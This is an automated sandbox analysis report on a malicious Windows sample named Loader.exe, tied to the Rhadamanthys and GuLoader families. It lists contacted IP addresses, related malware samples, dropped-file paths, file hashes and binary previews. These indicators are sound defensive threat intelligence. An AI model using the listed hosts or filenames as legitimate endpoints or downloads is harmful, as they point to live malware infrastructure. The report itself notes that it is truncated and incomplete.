                                                                                                                                                                                                                                              		2914NTT-COMMUNICATIONS-2914USfalse
                                                                                                                                                                                                                                              162.159.61.3
                                                                                                                                                                                                                                              		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              77.238.245.43
                                                                                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                                                                                              		42429TELERU-ASRUfalse
                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                              		unknownReserved
                                                                                                                                                                                                                                              		unknownunknownfalse
                                                                                                                                                                                                                                              172.64.41.3
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                                              Private

                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1579550
                                                                                                                                                                                                                                              Start date and time:2024-12-22 23:52:15 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 14m 8s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:32
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:Loader.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.phis.troj.spyw.evad.winEXE@58/347@12/13
                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 71.4%
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 80%
                                                                                                                                                                                                                                              • Number of executed functions: 300
                                                                                                                                                                                                                                              • Number of non-executed functions: 124
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 17.253.18.131, 17.253.18.99, 17.253.14.125, 212.138.170.134, 172.217.19.227, 142.250.181.142, 64.233.161.84, 13.107.42.16, 204.79.197.239, 13.107.21.239, 13.107.6.158, 13.107.246.63, 4.175.87.197, 23.218.208.109
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): pool.ntp.org, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, config.edge.skype.com.trafficmanager.net, otelrules.azureedge.net, slscr.update.microsoft.com, time.apple.com, ctldl.windowsupdate.com, clientservices.googleapis.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, time.g.aaplimg.com, business.bing.com, clients.l.google.com, l-0007.l-msedge.net, config.edge.skype.com, dual-a-0036.a-msedge.net
                                                                                                                                                                                                                                              • Execution Graph export aborted for target javaw.exe, PID 5908 because there are no executed function
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              17:53:23API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                              17:53:58API Interceptor10337087x Sleep call for process: javaw.exe modified
                                                                                                                                                                                                                                              17:54:13API Interceptor13x Sleep call for process: medicalanalysis.exe modified
                                                                                                                                                                                                                                              17:54:31API Interceptor1x Sleep call for process: medicallanalysis.exe modified
                                                                                                                                                                                                                                              17:55:11API Interceptor1x Sleep call for process: wmplayer.exe modified

                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              94.198.159.10t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                  List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                      213.239.239.164t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                        List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                          g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                              payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                      194.58.203.20medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                        t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                            HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                  download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    104.37.175.218medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousDarkTortilla, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRHADAMANTHYSBrowse

                                                                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          chrome.cloudflare-dns.comfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                                          SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                                          Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                                          ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                                          pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                                          invoice.docmGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                                          ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                                          QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                                          gbg1.ntp.netnod.set5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          ntp1.net.berkeley.edut5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 169.229.128.134
                                                                                                                                                                                                                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 169.229.128.134
                                                                                                                                                                                                                                                                                          H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 169.229.128.134
                                                                                                                                                                                                                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 169.229.128.134
                                                                                                                                                                                                                                                                                          wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 169.229.128.134
                                                                                                                                                                                                                                                                                          x.ns.gin.ntt.nett5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 129.250.35.250
                                                                                                                                                                                                                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 129.250.35.250
                                                                                                                                                                                                                                                                                          HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 129.250.35.250
                                                                                                                                                                                                                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 129.250.35.250

                                                                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          NTP-SEAnycastedNTPservicesfromNetnodIXPsSEmedicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 194.58.203.20
                                                                                                                                                                                                                                                                                          regscs.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                          • 194.58.200.20
                                                                                                                                                                                                                                                                                          PREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                          • 194.58.200.20
                                                                                                                                                                                                                                                                                          OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                          • 194.58.200.20
                                                                                                                                                                                                                                                                                          SIDNNLt5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 94.198.159.10
                                                                                                                                                                                                                                                                                          HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 94.198.159.10
                                                                                                                                                                                                                                                                                          List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 94.198.159.10
                                                                                                                                                                                                                                                                                          download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 94.198.159.10
                                                                                                                                                                                                                                                                                          MAJESTIC-HOSTING-01USmedicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.218
                                                                                                                                                                                                                                                                                          armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 191.96.140.106
                                                                                                                                                                                                                                                                                          1CSDmJh1zN.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.221
                                                                                                                                                                                                                                                                                          m58muJVjMg.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.221
                                                                                                                                                                                                                                                                                          PCrn0I0aO9.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.232
                                                                                                                                                                                                                                                                                          aHoqCI0AZq.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.221
                                                                                                                                                                                                                                                                                          LJqzegzQl0.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.221
                                                                                                                                                                                                                                                                                          ZtnN5sSpDk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.232
                                                                                                                                                                                                                                                                                          wg7SDQAffQ.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.221
                                                                                                                                                                                                                                                                                          Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 104.37.175.232
                                                                                                                                                                                                                                                                                          HETZNER-ASDEGoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                          • 94.130.188.57
                                                                                                                                                                                                                                                                                          https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 135.181.58.223
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 94.130.188.57
                                                                                                                                                                                                                                                                                          https://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvVGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 136.243.5.53
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 94.130.188.57
                                                                                                                                                                                                                                                                                          nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                          • 95.217.252.201
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                          • 94.130.188.57
                                                                                                                                                                                                                                                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                                          • 188.40.81.35
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                          • 116.203.12.114
                                                                                                                                                                                                                                                                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                                          • 49.12.109.196

                                                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0emedicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126
                                                                                                                                                                                                                                                                                          winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126
                                                                                                                                                                                                                                                                                          Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126
                                                                                                                                                                                                                                                                                          NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126
                                                                                                                                                                                                                                                                                          NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126
                                                                                                                                                                                                                                                                                          HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126
                                                                                                                                                                                                                                                                                          HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126
                                                                                                                                                                                                                                                                                          swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 5.2.81.126

                                                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dllDHzscd9uqT.exeGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                                                                                                            AYoF5MX6wK.exeGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                                                                                                              Confirm Me.exeGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                                                                                                                PInstaller.exeGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                                                                                                                  123.sfx.exeGet hashmaliciousSTRRATBrowse
                                                                                                                                                                                                                                                                                                    EYOFFTITMDLXZJFFCCGFDTBIY.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      SSCBOLGZFXVJMEICRNQMJOCDIF.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                        BOCTGZXINFFCD20242108.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          PGCTGZXFCD20242008.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            CloudInstaller.zipGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                                                                              C:\Users\user\.oracle_jre_usage\a1643a9091f2d98.timestamp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):85
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.917508583779176
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:oNUkh4E2J5xAIAeLCwJRTnSUccji:oN923fAeLDli
                                                                                                                                                                                                                                                                                                              MD5:BBE0F4AF844E9A8F79553715A23B5357
                                                                                                                                                                                                                                                                                                              SHA1:5B26033E8D0C0BA9241AEBFA2B7A51F9CDC61BC6
                                                                                                                                                                                                                                                                                                              SHA-256:CE40472F63CC0F3E70A3C96EB016570F435ECA6E6C4181A92775297EF9484C93
                                                                                                                                                                                                                                                                                                              SHA-512:7268D79E1918D412801AF3F85640E5BA646626F1D2F484FA66178883A1C3CC453DFA8A60EE239E341F64F9C225CBEADA6A1566348C4E6E5EB5DE5EC1A2E2CF19
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657..1734907999212..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\CampaignHardwareLauncher\uninst.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):142804
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.117004274496417
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:x5BuYAVrgUCPnbCrlkLZGXUyOA6Hh225aKMHRJ:x50gUCDCr82sHcWV8J
                                                                                                                                                                                                                                                                                                              MD5:E344E5149AA71DA552A1E401CEA9CB26
                                                                                                                                                                                                                                                                                                              SHA1:17B8BE63F035D55528226DCBA7C3A8A7DFA8A337
                                                                                                                                                                                                                                                                                                              SHA-256:7AB1222FABD42B4912C20EE31D078C16F5A144701EA9C6CD3D2DE74944794694
                                                                                                                                                                                                                                                                                                              SHA-512:535912E17BF80ACF967B83B140690931D80DE4F0CBEA5C0C5EB10BF62E5C682E8F70B3826B421F7BC3BF11A9B7D83B24C106029E44110D7CE76C16768EC97089
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@..........................`............@.................................@............A...................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....A.......B..................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\medicallanalysis.exe.log

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):605
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.358009436765127
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat/DLI4M/DLI4M6:ML9E4KlKDE4KhKiKhgLE4qE4j
                                                                                                                                                                                                                                                                                                              MD5:9F6A0F406F4A837DEE72C5ABC72990E1
                                                                                                                                                                                                                                                                                                              SHA1:08D2D0026E52C2DC752E4E624C970F80EB9119D3
                                                                                                                                                                                                                                                                                                              SHA-256:E87FCC8AF26C629E5029F3914CE065224940D9B6506ED04DBEA3B8EDCC49AA2D
                                                                                                                                                                                                                                                                                                              SHA-512:10D3E068D401C9C9836DDD9355670114AA982A0CA6CACC34FA3DDD4FF21BDF7FE62083E8A46F7DE667ED228E8B6281C8F65EB531EDDF97F6612F091DA5C9342D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2232
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.379460230152629
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:fLHyIFKL3IZ2KRH9OugYs
                                                                                                                                                                                                                                                                                                              MD5:046745B14D061B6E178B71722C97B95D
                                                                                                                                                                                                                                                                                                              SHA1:2FBB516625B3C7390120BDFE48D7D7528425BBDF
                                                                                                                                                                                                                                                                                                              SHA-256:168CA4AE0871B8F96DB2F547CAD7BF740DD4DB6691CECB466A04B6FC27971810
                                                                                                                                                                                                                                                                                                              SHA-512:5FF76CFBDDA5E711D0B2A58AD247A77B589170FDC55D95E5B74D448EC4AD2A634538721F3C2E4CB8F116376624AEDDBF744169648E0A0C354BBC11444AA809ED
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

